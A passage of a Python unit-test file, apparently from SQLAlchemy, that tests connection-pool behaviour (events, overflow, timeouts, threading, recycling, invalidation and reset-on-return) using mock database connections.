isinstance(p, pool.QueuePool): lazy_gc() 
self.assert_(p.checkedout() == 0) c1 = p.connect() c2 = p.connect() if useclose: c2.close() c1.close() else: c2 = None c1 = None lazy_gc() self.assert_(p.checkedout() == 0) def test_info(self): p = self._queuepool_fixture(pool_size=1, max_overflow=0) c = p.connect() self.assert_(not c.info) self.assert_(c.info is c._connection_record.info) c.info['foo'] = 'bar' c.close() del c c = p.connect() self.assert_('foo' in c.info) c.invalidate() c = p.connect() self.assert_('foo' not in c.info) c.info['foo2'] = 'bar2' c.detach() self.assert_('foo2' in c.info) c2 = p.connect() is_not_(c.connection, c2.connection) assert not c2.info assert 'foo2' in c.info class PoolDialectTest(PoolTestBase): def _dialect(self): canary = [] class PoolDialect(object): def do_rollback(self, dbapi_connection): canary.append('R') dbapi_connection.rollback() def do_commit(self, dbapi_connection): canary.append('C') dbapi_connection.commit() def do_close(self, dbapi_connection): canary.append('CL') dbapi_connection.close() return PoolDialect(), canary def _do_test(self, pool_cls, assertion): mock_dbapi = MockDBAPI() dialect, canary = self._dialect() p = pool_cls(creator=mock_dbapi.connect) p._dialect = dialect conn = p.connect() conn.close() p.dispose() p.recreate() conn = p.connect() conn.close() eq_(canary, assertion) def test_queue_pool(self): self._do_test(pool.QueuePool, ['R', 'CL', 'R']) def test_assertion_pool(self): self._do_test(pool.AssertionPool, ['R', 'CL', 'R']) def test_singleton_pool(self): self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R']) def test_null_pool(self): self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL']) def test_static_pool(self): self._do_test(pool.StaticPool, ['R', 'R']) class PoolEventsTest(PoolTestBase): def _first_connect_event_fixture(self): p = self._queuepool_fixture() canary = [] def first_connect(*arg, **kw): canary.append('first_connect') event.listen(p, 'first_connect', first_connect) return p, canary def _connect_event_fixture(self): p = 
self._queuepool_fixture() canary = [] def connect(*arg, **kw): canary.append('connect') event.listen(p, 'connect', connect) return p, canary def _checkout_event_fixture(self): p = self._queuepool_fixture() canary = [] def checkout(*arg, **kw): canary.append('checkout') event.listen(p, 'checkout', checkout) return p, canary def _checkin_event_fixture(self): p = self._queuepool_fixture() canary = [] def checkin(*arg, **kw): canary.append('checkin') event.listen(p, 'checkin', checkin) return p, canary def _reset_event_fixture(self): p = self._queuepool_fixture() canary = [] def reset(*arg, **kw): canary.append('reset') event.listen(p, 'reset', reset) return p, canary def _invalidate_event_fixture(self): p = self._queuepool_fixture() canary = Mock() event.listen(p, 'invalidate', canary) return p, canary def test_first_connect_event(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() eq_(canary, ['first_connect']) def test_first_connect_event_fires_once(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['first_connect']) def test_first_connect_on_previously_recreated(self): p, canary = self._first_connect_event_fixture() p2 = p.recreate() c1 = p.connect() c2 = p2.connect() eq_(canary, ['first_connect', 'first_connect']) def test_first_connect_on_subsequently_recreated(self): p, canary = self._first_connect_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['first_connect', 'first_connect']) def test_connect_event(self): p, canary = self._connect_event_fixture() c1 = p.connect() eq_(canary, ['connect']) def test_connect_event_fires_subsequent(self): p, canary = self._connect_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['connect', 'connect']) def test_connect_on_previously_recreated(self): p, canary = self._connect_event_fixture() p2 = p.recreate() c1 = p.connect() c2 = p2.connect() eq_(canary, ['connect', 'connect']) def 
test_connect_on_subsequently_recreated(self): p, canary = self._connect_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['connect', 'connect']) def test_checkout_event(self): p, canary = self._checkout_event_fixture() c1 = p.connect() eq_(canary, ['checkout']) def test_checkout_event_fires_subsequent(self): p, canary = self._checkout_event_fixture() c1 = p.connect() c2 = p.connect() eq_(canary, ['checkout', 'checkout']) def test_checkout_event_on_subsequently_recreated(self): p, canary = self._checkout_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, ['checkout', 'checkout']) def test_checkin_event(self): p, canary = self._checkin_event_fixture() c1 = p.connect() eq_(canary, []) c1.close() eq_(canary, ['checkin']) def test_reset_event(self): p, canary = self._reset_event_fixture() c1 = p.connect() eq_(canary, []) c1.close() eq_(canary, ['reset']) def test_invalidate_event_no_exception(self): p, canary = self._invalidate_event_fixture() c1 = p.connect() c1.close() assert not canary.called c1 = p.connect() dbapi_con = c1.connection c1.invalidate() assert canary.call_args_list[0][0][0] is dbapi_con assert canary.call_args_list[0][0][2] is None def test_invalidate_event_exception(self): p, canary = self._invalidate_event_fixture() c1 = p.connect() c1.close() assert not canary.called c1 = p.connect() dbapi_con = c1.connection exc = Exception("hi") c1.invalidate(exc) assert canary.call_args_list[0][0][0] is dbapi_con assert canary.call_args_list[0][0][2] is exc def test_checkin_event_gc(self): p, canary = self._checkin_event_fixture() c1 = p.connect() eq_(canary, []) del c1 lazy_gc() eq_(canary, ['checkin']) def test_checkin_event_on_subsequently_recreated(self): p, canary = self._checkin_event_fixture() c1 = p.connect() p2 = p.recreate() c2 = p2.connect() eq_(canary, []) c1.close() eq_(canary, ['checkin']) c2.close() eq_(canary, ['checkin', 'checkin']) def test_listen_targets_scope(self): canary = [] def 
listen_one(*args): canary.append("listen_one") def listen_two(*args): canary.append("listen_two") def listen_three(*args): canary.append("listen_three") def listen_four(*args): canary.append("listen_four") engine = testing_engine(testing.db.url) event.listen(pool.Pool, 'connect', listen_one) event.listen(engine.pool, 'connect', listen_two) event.listen(engine, 'connect', listen_three) event.listen(engine.__class__, 'connect', listen_four) engine.execute(select([1])).close() eq_( canary, ["listen_one", "listen_four", "listen_two", "listen_three"] ) def test_listen_targets_per_subclass(self): """test that listen() called on a subclass remains specific to that subclass.""" canary = [] def listen_one(*args): canary.append("listen_one") def listen_two(*args): canary.append("listen_two") def listen_three(*args): canary.append("listen_three") event.listen(pool.Pool, 'connect', listen_one) event.listen(pool.QueuePool, 'connect', listen_two) event.listen(pool.SingletonThreadPool, 'connect', listen_three) p1 = pool.QueuePool(creator=MockDBAPI().connect) p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect) assert listen_one in p1.dispatch.connect assert listen_two in p1.dispatch.connect assert listen_three not in p1.dispatch.connect assert listen_one in p2.dispatch.connect assert listen_two not in p2.dispatch.connect assert listen_three in p2.dispatch.connect p1.connect() eq_(canary, ["listen_one", "listen_two"]) p2.connect() eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"]) def teardown(self): # TODO: need to get remove() functionality # going pool.Pool.dispatch._clear() class PoolFirstConnectSyncTest(PoolTestBase): # test [ticket:2964] def test_sync(self): pool = self._queuepool_fixture(pool_size=3, max_overflow=0) evt = Mock() @event.listens_for(pool, 'first_connect') def slow_first_connect(dbapi_con, rec): time.sleep(1) evt.first_connect() @event.listens_for(pool, 'connect') def on_connect(dbapi_con, rec): evt.connect() def checkout(): for j in 
range(2): c1 = pool.connect() time.sleep(.02) c1.close() time.sleep(.02) threads = [] for i in range(5): th = threading.Thread(target=checkout) th.start() threads.append(th) for th in threads: th.join(join_timeout) eq_(evt.mock_calls, [call.first_connect(), call.connect(), call.connect(), call.connect()] ) class DeprecatedPoolListenerTest(PoolTestBase): @testing.requires.predictable_gc @testing.uses_deprecated(r".*Use event.listen") def test_listeners(self): class InstrumentingListener(object): def __init__(self): if hasattr(self, 'connect'): self.connect = self.inst_connect if hasattr(self, 'first_connect'): self.first_connect = self.inst_first_connect if hasattr(self, 'checkout'): self.checkout = self.inst_checkout if hasattr(self, 'checkin'): self.checkin = self.inst_checkin self.clear() def clear(self): self.connected = [] self.first_connected = [] self.checked_out = [] self.checked_in = [] def assert_total(innerself, conn, fconn, cout, cin): eq_(len(innerself.connected), conn) eq_(len(innerself.first_connected), fconn) eq_(len(innerself.checked_out), cout) eq_(len(innerself.checked_in), cin) def assert_in(innerself, item, in_conn, in_fconn, in_cout, in_cin): self.assert_((item in innerself.connected) == in_conn) self.assert_((item in innerself.first_connected) == in_fconn) self.assert_((item in innerself.checked_out) == in_cout) self.assert_((item in innerself.checked_in) == in_cin) def inst_connect(self, con, record): print("connect(%s, %s)" % (con, record)) assert con is not None assert record is not None self.connected.append(con) def inst_first_connect(self, con, record): print("first_connect(%s, %s)" % (con, record)) assert con is not None assert record is not None self.first_connected.append(con) def inst_checkout(self, con, record, proxy): print("checkout(%s, %s, %s)" % (con, record, proxy)) assert con is not None assert record is not None assert proxy is not None self.checked_out.append(con) def inst_checkin(self, con, record): print("checkin(%s, %s)" 
        # NOTE(review): this chunk opens mid-statement — the expression below
        # completes an assertion message begun on a previous (unseen) line of
        # the nested InstrumentingListener class.
                % (con, record))
                # con can be None if invalidated
                assert record is not None
                self.checked_in.append(con)

        # Listener variants: one that hooks every pool event, and one per
        # individual event, used to verify dispatch counts independently.
        class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
            pass

        class ListenConnect(InstrumentingListener):
            def connect(self, con, record):
                pass

        class ListenFirstConnect(InstrumentingListener):
            def first_connect(self, con, record):
                pass

        class ListenCheckOut(InstrumentingListener):
            def checkout(self, con, record, proxy, num):
                pass

        class ListenCheckIn(InstrumentingListener):
            def checkin(self, con, record):
                pass

        def assert_listeners(p, total, conn, fconn, cout, cin):
            # Verify per-event listener counts on the pool and on a
            # recreated copy (recreate() must carry listeners over).
            for instance in (p, p.recreate()):
                self.assert_(len(instance.dispatch.connect) == conn)
                self.assert_(len(instance.dispatch.first_connect) == fconn)
                self.assert_(len(instance.dispatch.checkout) == cout)
                self.assert_(len(instance.dispatch.checkin) == cin)

        p = self._queuepool_fixture()
        assert_listeners(p, 0, 0, 0, 0, 0)
        p.add_listener(ListenAll())
        assert_listeners(p, 1, 1, 1, 1, 1)
        p.add_listener(ListenConnect())
        assert_listeners(p, 2, 2, 1, 1, 1)
        p.add_listener(ListenFirstConnect())
        assert_listeners(p, 3, 2, 2, 1, 1)
        p.add_listener(ListenCheckOut())
        assert_listeners(p, 4, 2, 2, 2, 1)
        p.add_listener(ListenCheckIn())
        assert_listeners(p, 5, 2, 2, 2, 2)
        del p

        snoop = ListenAll()
        p = self._queuepool_fixture(listeners=[snoop])
        assert_listeners(p, 1, 1, 1, 1, 1)

        c = p.connect()
        snoop.assert_total(1, 1, 1, 0)
        cc = c.connection
        snoop.assert_in(cc, True, True, True, False)
        c.close()
        snoop.assert_in(cc, True, True, True, True)
        del c, cc
        snoop.clear()

        # this one depends on immediate gc
        c = p.connect()
        cc = c.connection
        snoop.assert_in(cc, False, False, True, False)
        snoop.assert_total(0, 0, 1, 0)
        del c, cc
        lazy_gc()
        snoop.assert_total(0, 0, 1, 1)

        p.dispose()
        snoop.clear()

        c = p.connect()
        c.close()
        c = p.connect()
        snoop.assert_total(1, 0, 2, 1)
        c.close()
        snoop.assert_total(1, 0, 2, 2)

        # invalidation
        p.dispose()
        snoop.clear()

        c = p.connect()
        snoop.assert_total(1, 0, 1, 0)
        c.invalidate()
        snoop.assert_total(1, 0, 1, 1)
        c.close()
        snoop.assert_total(1, 0, 1, 1)
        del c
        lazy_gc()
        snoop.assert_total(1, 0, 1, 1)
        c = p.connect()
        snoop.assert_total(2, 0, 2, 1)
        c.close()
        del c
        lazy_gc()
        snoop.assert_total(2, 0, 2, 2)

        # detached
        p.dispose()
        snoop.clear()

        c = p.connect()
        snoop.assert_total(1, 0, 1, 0)
        c.detach()
        snoop.assert_total(1, 0, 1, 0)
        c.close()
        del c
        snoop.assert_total(1, 0, 1, 0)
        c = p.connect()
        snoop.assert_total(2, 0, 2, 0)
        c.close()
        del c
        snoop.assert_total(2, 0, 2, 1)

        # recreated
        p = p.recreate()
        snoop.clear()

        c = p.connect()
        snoop.assert_total(1, 1, 1, 0)
        c.close()
        snoop.assert_total(1, 1, 1, 1)
        c = p.connect()
        snoop.assert_total(1, 1, 2, 1)
        c.close()
        snoop.assert_total(1, 1, 2, 2)

    @testing.uses_deprecated(r".*Use event.listen")
    def test_listeners_callables(self):
        # Same scenario as test_listeners, but with plain callables passed
        # in a dict rather than PoolListener subclasses.
        def connect(dbapi_con, con_record):
            counts[0] += 1

        def checkout(dbapi_con, con_record, con_proxy):
            counts[1] += 1

        def checkin(dbapi_con, con_record):
            counts[2] += 1

        i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
        i_connect = dict(connect=connect)
        i_checkout = dict(checkout=checkout)
        i_checkin = dict(checkin=checkin)

        # NOTE(review): `cls` is never used inside the loop body; the loop
        # appears intended to run the scenario per pool class — verify.
        for cls in (pool.QueuePool, pool.StaticPool):
            counts = [0, 0, 0]

            def assert_listeners(p, total, conn, cout, cin):
                for instance in (p, p.recreate()):
                    eq_(len(instance.dispatch.connect), conn)
                    eq_(len(instance.dispatch.checkout), cout)
                    eq_(len(instance.dispatch.checkin), cin)

            p = self._queuepool_fixture()
            assert_listeners(p, 0, 0, 0, 0)
            p.add_listener(i_all)
            assert_listeners(p, 1, 1, 1, 1)
            p.add_listener(i_connect)
            assert_listeners(p, 2, 1, 1, 1)
            p.add_listener(i_checkout)
            assert_listeners(p, 3, 1, 1, 1)
            p.add_listener(i_checkin)
            assert_listeners(p, 4, 1, 1, 1)
            del p

            p = self._queuepool_fixture(listeners=[i_all])
            assert_listeners(p, 1, 1, 1, 1)

            c = p.connect()
            assert counts == [1, 1, 0]
            c.close()
            assert counts == [1, 1, 1]

            c = p.connect()
            assert counts == [1, 2, 1]
            p.add_listener(i_checkin)
            c.close()
            assert counts == [1, 2, 2]


class QueuePoolTest(PoolTestBase):
    """Exercises QueuePool: size/overflow accounting, timeouts, and
    thread-safety under concurrent checkout."""

    def testqueuepool_del(self):
        self._do_testqueuepool(useclose=False)

    def testqueuepool_close(self):
        self._do_testqueuepool(useclose=True)

    def _do_testqueuepool(self, useclose=False):
        # Shared body: exercise checkout/checkin bookkeeping either via
        # explicit close() or via garbage collection of the fairies.
        p = self._queuepool_fixture(pool_size=3, max_overflow=-1)

        def status(pool):
            # (size, checked-in, overflow, checked-out) snapshot.
            tup = pool.size(), pool.checkedin(), pool.overflow(), \
                pool.checkedout()
            print('Pool size: %d Connections in pool: %d Current '
                  'Overflow: %d Current Checked out connections: %d' % tup)
            return tup

        c1 = p.connect()
        self.assert_(status(p) == (3, 0, -2, 1))
        c2 = p.connect()
        self.assert_(status(p) == (3, 0, -1, 2))
        c3 = p.connect()
        self.assert_(status(p) == (3, 0, 0, 3))
        c4 = p.connect()
        self.assert_(status(p) == (3, 0, 1, 4))
        c5 = p.connect()
        self.assert_(status(p) == (3, 0, 2, 5))
        c6 = p.connect()
        self.assert_(status(p) == (3, 0, 3, 6))
        if useclose:
            c4.close()
            c3.close()
            c2.close()
        else:
            c4 = c3 = c2 = None
            lazy_gc()
        self.assert_(status(p) == (3, 3, 3, 3))
        if useclose:
            c1.close()
            c5.close()
            c6.close()
        else:
            c1 = c5 = c6 = None
            lazy_gc()
        self.assert_(status(p) == (3, 3, 0, 0))
        c1 = p.connect()
        c2 = p.connect()
        self.assert_(status(p) == (3, 1, 0, 2), status(p))
        if useclose:
            c2.close()
        else:
            c2 = None
            lazy_gc()
        self.assert_(status(p) == (3, 2, 0, 1))
        c1.close()
        lazy_gc()
        assert not pool._refs

    def test_timeout(self):
        # With max_overflow=0 and timeout=2, a 4th checkout must raise
        # TimeoutError after roughly 2 seconds.
        p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
        c1 = p.connect()
        c2 = p.connect()
        c3 = p.connect()
        now = time.time()
        try:
            c4 = p.connect()
            assert False
        except tsa.exc.TimeoutError:
            assert int(time.time() - now) == 2

    @testing.requires.threading_with_mock
    def test_timeout_race(self):
        # test a race condition where the initial connecting threads all race
        # to queue.Empty, then block on the mutex.  each thread consumes a
        # connection as they go in.  when the limit is reached, the remaining
        # threads go in, and get TimeoutError; even though they never got to
        # wait for the timeout on queue.get().  the fix involves checking the
        # timeout again within the mutex, and if so, unlocking and throwing
        # them back to the start of do_get()
        dbapi = MockDBAPI()
        p = pool.QueuePool(
            creator=lambda: dbapi.connect(delay=.05),
            pool_size=2,
            max_overflow=1, use_threadlocal=False, timeout=3)
        timeouts = []

        def checkout():
            for x in range(1):
                now = time.time()
                try:
                    c1 = p.connect()
                except tsa.exc.TimeoutError:
                    timeouts.append(time.time() - now)
                    continue
                time.sleep(4)
                c1.close()

        threads = []
        for i in range(10):
            th = threading.Thread(target=checkout)
            th.start()
            threads.append(th)
        for th in threads:
            th.join(join_timeout)

        assert len(timeouts) > 0
        for t in timeouts:
            assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should under 4 seconds,
            # but on a loaded down buildbot it can go up.
            assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts

    def _test_overflow(self, thread_count, max_overflow):
        # Hammer the pool from `thread_count` threads and assert the observed
        # overflow never exceeds the configured max_overflow.
        gc_collect()
        dbapi = MockDBAPI()

        def creator():
            time.sleep(.05)
            return dbapi.connect()

        p = pool.QueuePool(creator=creator, pool_size=3, timeout=2,
                           max_overflow=max_overflow)
        peaks = []

        def whammy():
            for i in range(10):
                try:
                    con = p.connect()
                    time.sleep(.005)
                    peaks.append(p.overflow())
                    con.close()
                    del con
                except tsa.exc.TimeoutError:
                    pass

        threads = []
        for i in range(thread_count):
            th = threading.Thread(target=whammy)
            th.start()
            threads.append(th)
        for th in threads:
            th.join(join_timeout)

        self.assert_(max(peaks) <= max_overflow)
        lazy_gc()
        assert not pool._refs

    def test_overflow_reset_on_failed_connect(self):
        # A failed connect must not leak an overflow slot.
        dbapi = Mock()

        def failing_dbapi():
            time.sleep(2)
            raise Exception("connection failed")

        creator = dbapi.connect

        def create():
            return creator()

        p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
        c1 = p.connect()
        c2 = p.connect()
        c3 = p.connect()
        eq_(p._overflow, 1)
        creator = failing_dbapi
        assert_raises(Exception, p.connect)
        eq_(p._overflow, 1)

    @testing.requires.threading_with_mock
    def test_hanging_connect_within_overflow(self):
        """test that a single connect() call which is hanging
        does not block other connections from proceeding."""

        dbapi = Mock()
        mutex = threading.Lock()

        def hanging_dbapi():
            time.sleep(2)
            with mutex:
                return dbapi.connect()

        def fast_dbapi():
            with mutex:
                return dbapi.connect()

        # thread-local connector selection so each worker picks its own
        # (hanging vs. fast) connect behavior.
        creator = threading.local()

        def create():
            return creator.mock_connector()

        def run_test(name, pool, should_hang):
            if should_hang:
                creator.mock_connector = hanging_dbapi
            else:
                creator.mock_connector = fast_dbapi

            conn = pool.connect()
            conn.operation(name)
            time.sleep(1)
            conn.close()

        p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)

        threads = [
            threading.Thread(
                target=run_test, args=("success_one", p, False)),
            threading.Thread(
                target=run_test, args=("success_two", p, False)),
            threading.Thread(
                target=run_test, args=("overflow_one", p, True)),
            threading.Thread(
                target=run_test, args=("overflow_two", p, False)),
            threading.Thread(
                target=run_test, args=("overflow_three", p, False))
        ]
        for t in threads:
            t.start()
            time.sleep(.2)

        for t in threads:
            t.join(timeout=join_timeout)
        # the hanging connect ("overflow_one") finishes last; everyone else
        # proceeded without waiting on it.
        eq_(
            dbapi.connect().operation.mock_calls,
            [call("success_one"), call("success_two"),
             call("overflow_two"), call("overflow_three"),
             call("overflow_one")]
        )

    @testing.requires.threading_with_mock
    def test_waiters_handled(self):
        """test that threads waiting for connections are
        handled when the pool is replaced.

        """
        mutex = threading.Lock()
        dbapi = MockDBAPI()

        def creator():
            mutex.acquire()
            try:
                return dbapi.connect()
            finally:
                mutex.release()

        success = []
        for timeout in (None, 30):
            for max_overflow in (0, -1, 3):
                p = pool.QueuePool(creator=creator,
                                   pool_size=2, timeout=timeout,
                                   max_overflow=max_overflow)

                def waiter(p, timeout, max_overflow):
                    success_key = (timeout, max_overflow)
                    conn = p.connect()
                    success.append(success_key)
                    time.sleep(.1)
                    conn.close()

                c1 = p.connect()
                c2 = p.connect()

                threads = []
                for i in range(2):
                    t = threading.Thread(target=waiter,
                                         args=(p, timeout, max_overflow))
                    t.daemon = True
                    t.start()
                    threads.append(t)

                # this sleep makes sure that the
                # two waiter threads hit upon wait()
                # inside the queue, before we invalidate the other
                # two conns
                time.sleep(.2)
                p2 = p._replace()

                for t in threads:
                    t.join(join_timeout)

        # 2 waiters x 2 timeouts x 3 overflow settings = 12 successes
        eq_(len(success), 12, "successes: %s" % success)

    @testing.requires.threading_with_mock
    def test_notify_waiters(self):
        dbapi = MockDBAPI()
        canary = []

        def creator1():
            canary.append(1)
            return dbapi.connect()

        def creator2():
            canary.append(2)
            return dbapi.connect()

        p1 = pool.QueuePool(creator=creator1,
                            pool_size=1, timeout=None,
                            max_overflow=0)
        p2 = pool.NullPool(creator=creator2)

        def waiter(p):
            conn = p.connect()
            time.sleep(.5)
            conn.close()

        c1 = p1.connect()

        threads = []
        for i in range(5):
            t = threading.Thread(target=waiter, args=(p1, ))
            t.start()
            threads.append(t)
        time.sleep(.5)
        eq_(canary, [1])
        # aborting p1's queue redirects the five blocked waiters onto p2.
        p1._pool.abort(p2)

        for t in threads:
            t.join(join_timeout)

        eq_(canary, [1, 2, 2, 2, 2, 2])

    def test_dispose_closes_pooled(self):
        dbapi = MockDBAPI()

        p = pool.QueuePool(creator=dbapi.connect,
                           pool_size=2, timeout=None,
                           max_overflow=0)
        c1 = p.connect()
        c2 = p.connect()
        c1_con = c1.connection
        c2_con = c2.connection
        c1.close()
        eq_(c1_con.close.call_count, 0)
        eq_(c2_con.close.call_count, 0)
        p.dispose()
        # dispose() closes only the checked-in connection.
        eq_(c1_con.close.call_count, 1)
        eq_(c2_con.close.call_count, 0)

        # currently, if a ConnectionFairy is closed
        # after the pool has been disposed, there's no
        # flag that states it should be invalidated
        # immediately - it just gets returned to the
        # pool normally...
        c2.close()
        eq_(c1_con.close.call_count, 1)
        eq_(c2_con.close.call_count, 0)

        # ...and that's the one we'll get back next.
        c3 = p.connect()
        assert c3.connection is c2_con

    @testing.requires.threading_with_mock
    def test_no_overflow(self):
        self._test_overflow(40, 0)

    @testing.requires.threading_with_mock
    def test_max_overflow(self):
        self._test_overflow(40, 5)

    def test_mixed_close(self):
        pool._refs.clear()
        p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
                                    use_threadlocal=True)
        c1 = p.connect()
        c2 = p.connect()
        assert c1 is c2
        c1.close()
        c2 = None
        assert p.checkedout() == 1
        c1 = None
        lazy_gc()
        assert p.checkedout() == 0
        lazy_gc()
        assert not pool._refs

    def test_overflow_no_gc_tlocal(self):
        self._test_overflow_no_gc(True)

    def test_overflow_no_gc(self):
        self._test_overflow_no_gc(False)

    def _test_overflow_no_gc(self, threadlocal):
        p = self._queuepool_fixture(pool_size=2, max_overflow=2)

        # disable weakref collection of the
        # underlying connections
        strong_refs = set()

        def _conn():
            c = p.connect()
            strong_refs.add(c.connection)
            return c

        for j in range(5):
            # open 4 conns at a time.  each time this
            # will yield two pooled connections + two
            # overflow connections.
            conns = [_conn() for i in range(4)]
            for c in conns:
                c.close()

        # doing that for a total of 5 times yields
        # ten overflow connections closed plus the
        # two pooled connections unclosed.
        # NOTE(review): continues _test_overflow_no_gc from the previous
        # chunk — verify the ten closed overflow conns plus two open ones.
        eq_(
            set([c.close.call_count for c in strong_refs]),
            set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
        )

    @testing.requires.predictable_gc
    def test_weakref_kaboom(self):
        p = self._queuepool_fixture(pool_size=3,
                                    max_overflow=-1, use_threadlocal=True)
        c1 = p.connect()
        c2 = p.connect()
        c1.close()
        c2 = None
        del c1
        del c2
        gc_collect()
        assert p.checkedout() == 0
        c3 = p.connect()
        assert c3 is not None

    def test_trick_the_counter(self):
        """this is a "flaw" in the connection pool; since threadlocal
        uses a single ConnectionFairy per thread with an open/close
        counter, you can fool the counter into giving you a
        ConnectionFairy with an ambiguous counter.  i.e. its not true
        reference counting."""

        p = self._queuepool_fixture(pool_size=3,
                                    max_overflow=-1, use_threadlocal=True)
        c1 = p.connect()
        c2 = p.connect()
        assert c1 is c2
        c1.close()
        c2 = p.connect()
        c2.close()
        self.assert_(p.checkedout() != 0)
        c2.close()
        self.assert_(p.checkedout() == 0)

    def test_recycle(self):
        # recycle=3: a connection older than 3 seconds is replaced on
        # the next checkout.
        p = self._queuepool_fixture(pool_size=1,
                                    max_overflow=0, recycle=3)
        c1 = p.connect()
        c_id = id(c1.connection)
        c1.close()
        c2 = p.connect()
        assert id(c2.connection) == c_id
        c2.close()
        time.sleep(4)
        c3 = p.connect()
        assert id(c3.connection) != c_id

    def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
        # p is QueuePool with size=1, max_overflow=2,
        # and one connection in the pool that will need to
        # reconnect when next used (either due to recycle or invalidate)
        eq_(p.checkedout(), 0)
        eq_(p._overflow, 0)
        dbapi.shutdown(True)
        assert_raises(
            Exception,
            p.connect
        )
        eq_(p._overflow, 0)
        eq_(p.checkedout(), 0)  # and not 1

        dbapi.shutdown(False)
        c1 = p.connect()
        assert p._pool.empty()  # poolsize is one, so we're empty OK
        c2 = p.connect()
        eq_(p._overflow, 1)  # and not 2

        # this hangs if p._overflow is 2
        c3 = p.connect()

    def test_error_on_pooled_reconnect_cleanup_invalidate(self):
        dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
        c1 = p.connect()
        c1.invalidate()
        c1.close()
        self._assert_cleanup_on_pooled_reconnect(dbapi, p)

    def test_error_on_pooled_reconnect_cleanup_recycle(self):
        dbapi, p = self._queuepool_dbapi_fixture(pool_size=1,
                                                 max_overflow=2, recycle=1)
        c1 = p.connect()
        c1.close()
        time.sleep(1)
        self._assert_cleanup_on_pooled_reconnect(dbapi, p)

    def test_invalidate(self):
        p = self._queuepool_fixture(pool_size=1, max_overflow=0)
        c1 = p.connect()
        c_id = c1.connection.id
        c1.close()
        c1 = None
        c1 = p.connect()
        assert c1.connection.id == c_id
        c1.invalidate()
        c1 = None
        c1 = p.connect()
        assert c1.connection.id != c_id

    def test_recreate(self):
        # recreate() must carry over configuration flags.
        p = self._queuepool_fixture(reset_on_return=None, pool_size=1,
                                    max_overflow=0)
        p2 = p.recreate()
        assert p2.size() == 1
        assert p2._reset_on_return is pool.reset_none
        assert p2._use_threadlocal is False
        assert p2._max_overflow == 0

    def test_reconnect(self):
        """tests reconnect operations at the pool level.  SA's
        engine/dialect includes another layer of reconnect support for
        'database was lost' errors."""

        dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
        c1 = p.connect()
        c_id = c1.connection.id
        c1.close()
        c1 = None

        c1 = p.connect()
        assert c1.connection.id == c_id
        dbapi.raise_error = True
        c1.invalidate()
        c1 = None

        c1 = p.connect()
        assert c1.connection.id != c_id

    def test_detach(self):
        dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
        c1 = p.connect()
        c1.detach()
        c2 = p.connect()
        eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])

        # a detached connection is closed with the fairy, not returned
        # to the pool.
        c1_con = c1.connection
        assert c1_con is not None
        eq_(c1_con.close.call_count, 0)
        c1.close()
        eq_(c1_con.close.call_count, 1)

    def test_detach_via_invalidate(self):
        dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)

        c1 = p.connect()
        c1_con = c1.connection
        c1.invalidate()
        assert c1.connection is None
        eq_(c1_con.close.call_count, 1)

        c2 = p.connect()
        assert c2.connection is not c1_con
        c2_con = c2.connection

        c2.close()
        eq_(c2_con.close.call_count, 0)

    def test_threadfairy(self):
        p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
                                    use_threadlocal=True)
        c1 = p.connect()
        c1.close()
        c2 = p.connect()
        assert c2.connection is not None


class ResetOnReturnTest(PoolTestBase):
    """Verifies the reset_on_return behaviors: 'rollback', 'commit',
    None, and custom reset agents."""

    def _fixture(self, **kw):
        dbapi = Mock()
        return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
                                     **kw)

    def test_plain_rollback(self):
        dbapi, p = self._fixture(reset_on_return='rollback')

        c1 = p.connect()
        c1.close()
        assert dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_plain_commit(self):
        dbapi, p = self._fixture(reset_on_return='commit')

        c1 = p.connect()
        c1.close()
        assert not dbapi.connect().rollback.called
        assert dbapi.connect().commit.called

    def test_plain_none(self):
        dbapi, p = self._fixture(reset_on_return=None)

        c1 = p.connect()
        c1.close()
        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_agent_rollback(self):
        dbapi, p = self._fixture(reset_on_return='rollback')

        class Agent(object):
            def __init__(self, conn):
                self.conn = conn

            def rollback(self):
                self.conn.special_rollback()

            def commit(self):
                self.conn.special_commit()

        c1 = p.connect()
        c1._reset_agent = Agent(c1)
        c1.close()

        # the agent intercepts the reset; the raw DBAPI rollback is skipped.
        assert dbapi.connect().special_rollback.called
        assert not dbapi.connect().special_commit.called

        assert not dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

        # without an agent, the plain rollback path resumes.
        c1 = p.connect()
        c1.close()
        eq_(dbapi.connect().special_rollback.call_count, 1)
        eq_(dbapi.connect().special_commit.call_count, 0)

        assert dbapi.connect().rollback.called
        assert not dbapi.connect().commit.called

    def test_agent_commit(self):
        dbapi, p = self._fixture(reset_on_return='commit')

        class Agent(object):
            def __init__(self, conn):
                self.conn = conn

            def rollback(self):
                self.conn.special_rollback()

            def commit(self):
                self.conn.special_commit()

        c1 = p.connect()
        c1._reset_agent = Agent(c1)
        c1.close()
        assert not dbapi.connect().special_rollback.called
        assert dbapi.connect().special_commit.called

